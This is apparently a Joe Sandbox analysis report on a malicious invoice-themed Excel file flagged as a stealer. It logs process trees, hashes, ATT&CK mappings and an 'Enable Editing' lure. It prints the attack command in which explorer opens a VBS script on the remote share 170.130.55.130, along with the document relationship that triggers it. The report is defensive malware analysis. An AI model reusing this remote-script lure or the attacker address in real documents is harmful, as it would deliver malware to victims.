Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
re-march-26-2024-9856.xlsx

Overview

General Information

Sample name:re-march-26-2024-9856.xlsx
Analysis ID:1415996
MD5:0fe64551215d4dd591d98b165d74d986
SHA1:a507acb09dc6ecabcf510aceaac6febd51f01e72
SHA256:16663b57e182a8f945a9aa5f70627b4ffbd6369784c5744eff304ecacc40fb7f
Tags:Invoicexlsx
Infos:

Detection

MAC Stealer
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected MalDoc
Detected suspicious Microsoft Office reference URL
Opens network shares
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Document misses a certain OLE stream usually present in this Microsoft Office document type
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Explorer Process Tree Break
Tries to load missing DLLs

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2348 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • explorer.exe (PID: 312 cmdline: explorer \\170.130.55.130\share\a\Report-26-2024.vbs.......... MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • explorer.exe (PID: 2244 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
drawing1.xml.relsJoeSecurity_MalDoc_5Yara detected MalDocJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 564, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 2244, ProcessName: explorer.exe
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    Exploits

    barindex
    Source: drawing1.xml.relsExtracted files from sample: file:///\\170.130.55.130\share\a\report-26-2024.vbs..........
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24F09391.gifJump to behavior

    System Summary

    barindex
    Source: Screenshot number: 4Screenshot OCR: Enable Editing'. a 14 I 15 16 17 Open 18 19 20 21 22 23 24 Stay in the groove wIth .Micro
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing'. Stay in the groove with Microsoft Office Excel integration with Microsoft Azure C
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing'. Open Stay in the groove wIth Microsoft Office Excel integrauon with Microsoft Az
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: CCE0.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msisip.dllJump to behavior
    Source: classification engineClassification label: mal64.troj.spyw.expl.winXLSX@3/6@0/0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$re-march-26-2024-9856.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6DA0.tmpJump to behavior
    Source: re-march-26-2024-9856.xlsxOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
    Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: re-march-26-2024-9856.xlsxInitial sample: OLE zip file path = xl/media/image1.gif
    Source: re-march-26-2024-9856.xlsxInitial sample: OLE zip file path = xl/media/image2.gif
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: re-march-26-2024-9856.xlsxInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2428Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2836Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: drawing1.xml.rels, type: SAMPLE
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: \\170.130.55.130\shareJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: \\170.130.55.130\shareJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: \\170.130.55.130\shareJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: \\170.130.55.130\share\aJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: \\170.130.55.130\shareJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: \\170.130.55.130\shareJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: \\170.130.55.130\shareJump to behavior
    Source: C:\Windows\explorer.exeFile opened: \\170.130.55.130\share\a\Report-26-2024.vbsJump to behavior
    Source: C:\Windows\explorer.exeFile opened: \\170.130.55.130\share\a\Report-26-2024.vbsJump to behavior
    Source: C:\Windows\explorer.exeFile opened: \\170.130.55.130\share\Jump to behavior

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: drawing1.xml.rels, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts1
    Exploitation for Client Execution
    1
    Scripting
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Network Share Discovery
    Remote ServicesData from Local System1
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Process Injection
    NTDS3
    System Information Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    No contacted IP infos
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1415996
    Start date and time:2024-03-26 18:06:07 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 53s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:5
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:re-march-26-2024-9856.xlsx
    Detection:MAL
    Classification:mal64.troj.spyw.expl.winXLSX@3/6@0/0
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .xlsx
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: re-march-26-2024-9856.xlsx
    TimeTypeDescription
    17:07:16API Interceptor786x Sleep call for process: explorer.exe modified
    No context
    No context
    No context
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:GIF image data, version 89a, 600 x 306
    Category:dropped
    Size (bytes):16958
    Entropy (8bit):7.96408260407503
    Encrypted:false
    SSDEEP:384:aZiUiiutYoQzdcpLOUaE+PkB9rwOzgaT+M5Ia/7jmygOIoPdh73xXch6pquS:a0UiiwQzdch75+MDrwSgaT+M5IaTjpgj
    MD5:73DDF7A82966F15608A98F7E012C94CE
    SHA1:B94A150F2CC610FB2E54B1B7CBB9FC78F294E072
    SHA-256:31D19F23B76A5084784CBC6F9EC4F763D64959EBE8D249C42AD285BA1B7FBA89
    SHA-512:346CB54087921004BCFE8AC6564BEE40DC96E2E3320EFAC736EEBF26B46DC202BFA1DE40754025600AC45394DF5F0C13977CBC36A421946E8B70F498D089B35C
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:GIF89aX.2......6..............e..b..a..g..^..\..h..Z..Y..W..i..k%.m'.n).o..U..R..q..P..O4.r9.t>.wC.y..L..I..KI.|M.~R..V....F..DZ..^..a..c..e..i..m..t..v................Ar..y..|..}....................................................?..>..<.............................................................................................:.............................................................................7..7..8..9..:..;..=..A..C..E..F..G..H..K..N%.S,.Y1.]5.`=.fB.jN.sR.wV.zY.|Z.}[.~\..b..i..m..q..u..t..y..{..}.................................................................................................................................................................................................................!.......,....X.2........H......*\(....#J.H....3j.... C..I...(S:\...0c.D....8s.....@W..J...A.*]...P.R<J.....j....`..K...h.]...p..K.kJ.x.*.X.......L.....~..*..#K.L.....nl.9f.1B..M....S.^....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:GIF image data, version 89a, 1692 x 810
    Category:dropped
    Size (bytes):40856
    Entropy (8bit):7.9852325920911245
    Encrypted:false
    SSDEEP:768:1i3Ojr8/lZRGe2PWGyIv0lc7VOorhpkaf3783zClQ+lZoN7FYx2YwAJZ6e:1i3OnslDGe2eGyIvJhaaO5Ny4iUe
    MD5:E37F96285A50BA0A0C008716DDA928CA
    SHA1:2D93A4936E38FC782D9FD1C1D1B5702BF4C45EFF
    SHA-256:EA1AEA55C3F4075915CA0C2384EAB6ED16596877D24F893172C10911F3282452
    SHA-512:2EA3F842E81C355E72BF52A5D9C5075D5BC1079DF3CFE23D2C475D8A551ED168ACE8FF3887389B85F01F9845D8537E59151492988D999A16AC2F7979641BA141
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:GIF89a..*............=........h..........~..}..~..|..{..x..{..m..g..h..e..d..Z.yK..c..b..b..`..^..[..W.X4.._..R..O..N.l<.V0.Q.........K..I..H._4.^2.\2.\1.[1.M)..........I..G..E..G..F..D..D.r:.j6.i6.h5.d4.U-.Q*.K'.F$..D..A..C..B..A..?.{=.w:.l6.N&.D".?...M..S3.e;.kC.qM.yW.._..h..p..{......................F..A..>..>..=..>..<.~<.~;.}:.{:.z9.y8.u6.Z+.6..1..(......>..@..B..E..H".W*.]............?..;..<..;..9.|9.{7.x5.x7.w6.v5.u4.s5.s3.q2.o1.f..c,.V'.R$.K!....$..~<.~;.~?..D.|6.z5.x2.v2.p1.n/.m..l-.<..!..x6.v4.y6.w9..>&.Q.......t/.n+.k,.h+.]%.D..B.B.dB.cX.sk..l..}................s*..........o&...k!.h........b..Y............................................................................................................}}}zzzmmmkkkaaa^^^XXXUUUPPPIIIBBBAAA333&&&$$$......!.......,......*........H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....C..M....S.^....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.1464700112623651
    Encrypted:false
    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
    Malicious:false
    Reputation:high, very likely benign file
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Reputation:high, very likely benign file
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):165
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
    MD5:797869BB881CFBCDAC2064F92B26E46F
    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious:false
    Reputation:high, very likely benign file
    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Process:C:\Windows\SysWOW64\explorer.exe
    File Type:GLS_BINARY_LSB_FIRST
    Category:dropped
    Size (bytes):116
    Entropy (8bit):4.25236229454546
    Encrypted:false
    SSDEEP:3:rmHD/tH//llleYhtC4d1ydYhtq5kZty:rmHurYty
    MD5:1FF3DE735A87D719B35ED6D00689168C
    SHA1:6711956511BAB8C677A411EA33830E1A2139AC84
    SHA-256:36A192FDB029E0357EB75DF25BF3C2EF035DBCBB9B811527B7276C5CA6D2177E
    SHA-512:1160A3480E574315832F8A9B60D0A6293A14D3A259EA3B6E220EEC46D72504C66AF2712A7CEF030F0E0F548845FD1AFC1FEC43985FE56614A6AF27FB75C3BA57
    Malicious:false
    Preview:........t........................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....,..l..@E............
    File type:Microsoft Excel 2007+
    Entropy (8bit):7.908789436560601
    TrID:
    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
    • ZIP compressed archive (8000/1) 16.67%
    File name:re-march-26-2024-9856.xlsx
    File size:67'571 bytes
    MD5:0fe64551215d4dd591d98b165d74d986
    SHA1:a507acb09dc6ecabcf510aceaac6febd51f01e72
    SHA256:16663b57e182a8f945a9aa5f70627b4ffbd6369784c5744eff304ecacc40fb7f
    SHA512:1f92e43ad5f821d08bb2acc38a4608a9aace356aedaab5df7df11e5151e2658e2d66439af5c1edc30d5d4b06b5dedc736dff54e6f7d0136e0ed12d862f90a888
    SSDEEP:1536:VvAi3OnslDGe2eGyIvJhaaO5Ny4iUvRB75d/wSgE9pgyjxOqTX:JlOsj4yIRAzHiE/7n/tgE9pgyjxR
    TLSH:866301EBF16F4902D3727036884A21E63596A038E525FA5C08197BEE978061733E57EF
    File Content Preview:PK..........!.o;fli...........[Content_Types].xml ...(.........................................................................................................................................................................................................
    Icon Hash:2562ab89a7b7bfbf
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:False
    No network behavior found

    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:17:06:53
    Start date:25/03/2024
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Imagebase:0x13f3a0000
    File size:28'253'536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:2
    Start time:17:07:16
    Start date:25/03/2024
    Path:C:\Windows\SysWOW64\explorer.exe
    Wow64 process (32bit):true
    Commandline:explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
    Imagebase:0x980000
    File size:2'972'672 bytes
    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:false

    Target ID:3
    Start time:17:07:20
    Start date:25/03/2024
    Path:C:\Windows\explorer.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Imagebase:0xff2f0000
    File size:3'229'696 bytes
    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    No disassembly